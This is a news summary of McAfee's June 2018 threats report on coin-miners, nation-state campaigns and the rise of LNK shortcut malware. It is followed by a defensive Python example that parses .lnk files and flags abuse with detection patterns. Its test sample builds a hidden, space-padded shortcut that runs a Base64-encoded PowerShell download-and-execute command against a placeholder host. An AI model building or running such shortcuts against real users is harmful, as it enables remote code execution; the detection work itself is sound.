Criminals Avoid Detection Using Old Campaigns


McAfee Labs has released its Threats Report: June 2018, which highlights the notable investigative research and threat-trend statistics gathered from Q1 2018. A key finding was a sharp spike in coin-miner malware: the total number of samples rose by 629% in Q1 to more than 2.9 million.

The report also covers complex nation-state campaigns, driven by financially and politically motivated actors, that targeted users and enterprise systems worldwide.

“We have seen continued expansion of this criminal endeavor during the quarter,” the report states. “The goal of the perpetrators is to monetize their criminal activity by expending the least amount of effort, using the fewest middlemen, and executing their crimes in the shortest time possible and with the least risk of discovery.”

Bad actors continue to grow more innovative and demonstrate an impressive level of technical agility, improving on several of the attack schemes that emerged at the end of 2017. With some technical creativity, these actors have discovered new ways to avoid detection and mitigation.

Among the key campaigns were Gold Dragon, Lazarus, GhostSecret and Bankshot. “Gold Dragon is a particularly slippery instance of fileless malware because it is designed to be evasive, checking on processes related to antimalware solutions,” the report stated.

Researchers believe GhostSecret, a currently active and extremely complex campaign, is associated with the group known as Hidden Cobra. The campaign, which “employs a series of implants to appropriate data from infected systems, is also characterized by its ability to evade detection and throw forensic investigators off its trail.”

The Lazarus cybercrime ring returned to target global financial organizations and Bitcoin users with a new Bitcoin-stealing phishing campaign dubbed HaoBao.

Overall, the June report highlights how attackers keep refining their tradecraft. One example is the shift from PowerShell to Windows shortcut (LNK) files as the initial vehicle. “In 2017 we saw a surge in the exploitation of benign technologies for malicious purposes, such as PowerShell. In Q1 2018, we saw malicious actors turn away from PowerShell exploits, which dropped 77%, and take advantage of LNK capabilities. New LNK malware rose 59% in Q1.”
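The shortcut abuse the report describes relies on what a .lnk file can carry: a target pointing at a command interpreter or script host, a long command line, and a ShowCommand that keeps the window out of sight. The following is an added example (not code from McAfee or the report) of a minimal Shell Link parser following the MS-SHLLINK layout (fixed 76-byte header, optional LinkTargetIDList and LinkInfo which are skipped, then the StringData fields) with a few triage heuristics run over two constructed samples. Names such as `build_lnk`, `assess` and `scan`, the thresholds, and the sample paths and payload are assumptions made for the example.

```python
"""Parse Windows Shell Link (.lnk) files and flag shortcut-abuse indicators.
Added example for illustration; not McAfee's or the report's code."""
import base64
import re
import struct
from dataclasses import dataclass
from typing import List, Optional

LNK_HEADER_SIZE = 0x4C
# LinkCLSID {00021401-0000-0000-C000-000000000046} in on-disk little-endian order
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80

SW_SHOWNORMAL = 1
SW_SHOWMINNOACTIVE = 7  # start minimised: the usual choice for malicious shortcuts

# StringData entries appear in this fixed order, each gated by its flag
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))


@dataclass
class ShellLink:
    flags: int
    show_command: int
    name: Optional[str] = None
    relative_path: Optional[str] = None
    working_dir: Optional[str] = None
    arguments: Optional[str] = None
    icon_location: Optional[str] = None


def parse_lnk(data: bytes) -> ShellLink:
    """Decode the header and StringData; IDList and LinkInfo are skipped, not parsed."""
    if len(data) < LNK_HEADER_SIZE:
        raise ValueError("file shorter than ShellLinkHeader")
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    show_command = struct.unpack_from("<I", data, 0x3C)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]   # IDListSize + IDList
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]       # LinkInfoSize includes itself
    link = ShellLink(flags=flags, show_command=show_command)
    unicode = bool(flags & IS_UNICODE)
    for flag, fname in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]     # CountCharacters, no terminator
        pos += 2
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        if len(raw) != nbytes:
            raise ValueError(f"truncated StringData field {fname}")
        setattr(link, fname, raw.decode("utf-16-le" if unicode else "cp1252"))
        pos += nbytes
    return link


SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe"}
HOST_IN_ARGS = re.compile(r"\b(powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin)\b", re.I)
ENCODED_CMD = re.compile(r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b", re.I)


def assess(link: ShellLink) -> List[str]:
    """Return human-readable findings; an empty list means nothing looked suspicious."""
    findings = []
    target = (link.relative_path or "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = link.arguments or ""
    if target in SCRIPT_HOSTS:
        findings.append(f"target is a command interpreter or script host: {target}")
    m = HOST_IN_ARGS.search(args)
    if m:
        findings.append(f"arguments invoke {m.group(1).lower()}")
    if ENCODED_CMD.search(args):
        findings.append("arguments carry a Base64-encoded PowerShell command")
    if HIDDEN_WINDOW.search(args) or link.show_command == SW_SHOWMINNOACTIVE:
        findings.append("launch is configured to hide or minimise the window")
    leading = len(args) - len(args.lstrip())
    if leading >= 16:   # threshold is an assumption; padding pushes the command out of view
        findings.append(f"{leading} leading spaces hide the real command in the Properties view")
    if len(args) > 260:  # the Properties dialog Target field shows at most 260 characters
        findings.append(f"command line is {len(args)} chars, longer than the Properties dialog shows")
    return findings


def build_lnk(relative_path: str, arguments: Optional[str] = None,
              show_command: int = SW_SHOWNORMAL) -> bytes:
    """Assemble a minimal .lnk (header, RELATIVE_PATH, optional ARGUMENTS, TerminalBlock)."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | (HAS_ARGUMENTS if arguments is not None else 0)
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, arguments) if s is not None)
    return header + body + b"\x00\x00\x00\x00"


# Constructed samples for the example; not real-world files
BENIGN_LNK = build_lnk("..\\..\\Program Files\\Notepad++\\notepad++.exe")
_payload = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
MALICIOUS_LNK = build_lnk(
    "..\\..\\Windows\\System32\\cmd.exe",
    " " * 64 + "/c powershell -nop -w hidden -enc "
    + base64.b64encode(_payload.encode("utf-16-le")).decode(),
    show_command=SW_SHOWMINNOACTIVE)


def scan(data: bytes) -> List[str]:
    return assess(parse_lnk(data))


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("malicious", MALICIOUS_LNK)):
        print(label, scan(blob) or ["clean"])
```

The heuristics are deliberately coarse: a legitimate administrative shortcut can hit one of them, so they are triage signals to rank shortcuts arriving in archives or e-mail, not a verdict. Real samples often also carry an IDList and LinkInfo block; the parser skips those by their declared sizes, which is enough to reach the StringData that holds the command line.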
